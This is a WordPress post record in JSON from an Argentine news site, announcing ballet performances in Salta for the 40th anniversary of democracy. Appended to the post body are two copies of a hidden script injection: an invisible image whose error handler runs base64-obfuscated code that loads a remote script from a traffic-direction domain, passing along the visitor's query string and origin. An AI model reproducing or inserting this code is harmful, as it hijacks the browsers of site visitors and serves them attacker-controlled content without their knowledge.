{"id":2670,"date":"2023-05-23T12:46:20","date_gmt":"2023-05-23T15:46:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2670"},"modified":"2025-08-14T00:16:17","modified_gmt":"2025-08-14T03:16:17","slug":"el-ballet-provincial-estrena-obras-en-junio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2670","title":{"rendered":"El Ballet provincial estrena obras en junio"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b50a35\"><em>El cuerpo art\u00edstico ofrecer\u00e1 un programa dentro del marco de los 40 a\u00f1os de Democracia que adem\u00e1s comprende funciones exclusivamente destinadas a estudiantes.<\/em><\/h4>\n\n\n\n<p>Los d\u00edas 23 y 24 de junio a las 21 horas, el Ballet de la Provincia de Salta, bajo la direcci\u00f3n de Miguel El\u00edas, se presentar\u00e1 en el Teatro Provincial \u201cJuan Carlos Saravia\u201d (Zuvir\u00eda N\u00ba70), con un programa dedicado a los 40 A\u00f1os ininterrumpidos de Democracia en Argentina.<\/p>\n\n\n\n<p>Las obras elegidas para esta ocasi\u00f3n son: Direcci\u00f3n Obligatoria, con m\u00fasica de Steve Reich y Las 4 Estaciones, con m\u00fasica de Antonio Vivaldi, ambas con coreograf\u00eda de Alejandro Cervera.<\/p>\n\n\n\n<p>Cabe mencionar que Direcci\u00f3n Obligatoria fue estrenada en 1983 en plena transici\u00f3n de recuperaci\u00f3n de la democracia y es un grato desaf\u00edo recuperar este trabajo como alegato hist\u00f3rico y pol\u00edtico. La propuesta se completa con Las 4 estaciones de Vivaldi, obra fundamental del periodo barroco. &nbsp;<\/p>\n\n\n\n<p>Asimismo, la direcci\u00f3n del Ballet de la Provincia anunci\u00f3 funciones exclusivamente para estudiantes el d\u00eda 30 de junio a las 11 y 15 hs. en el Teatro Provincial.<\/p>\n\n\n\n<p>El valor de las localidades es de $500 y se podr\u00e1n adquirir pr\u00f3ximamente en SALTA TICKET www.saltaticket.gob.ar o por boleter\u00eda del Teatro Provincial.<\/p>\n\n\n\n<p>Entrada gratuita para estudiantes y jubilados se retiran por boleter\u00eda acreditando condici\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-ballet-provincial-estrena-obras-en-junio-89777\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El cuerpo art\u00edstico ofrecer\u00e1 un programa dentro del marco de los 40 a\u00f1os de Democracia que adem\u00e1s comprende funciones exclusivamente destinadas a estudiantes. Los d\u00edas 23 y 24 de junio a las 21 horas, el Ballet de la Provincia de Salta, bajo la direcci\u00f3n de Miguel El\u00edas, se presentar\u00e1 en el Teatro Provincial \u201cJuan Carlos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2671,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[8,17],"tags":[],"class_list":{"0":"post-2670","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-eventos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2670"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2670"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2670\/revisions"}],"predecessor-version":[{"id":7075,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2670\/revisions\/7075"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2671"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2670"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2670"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2670"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}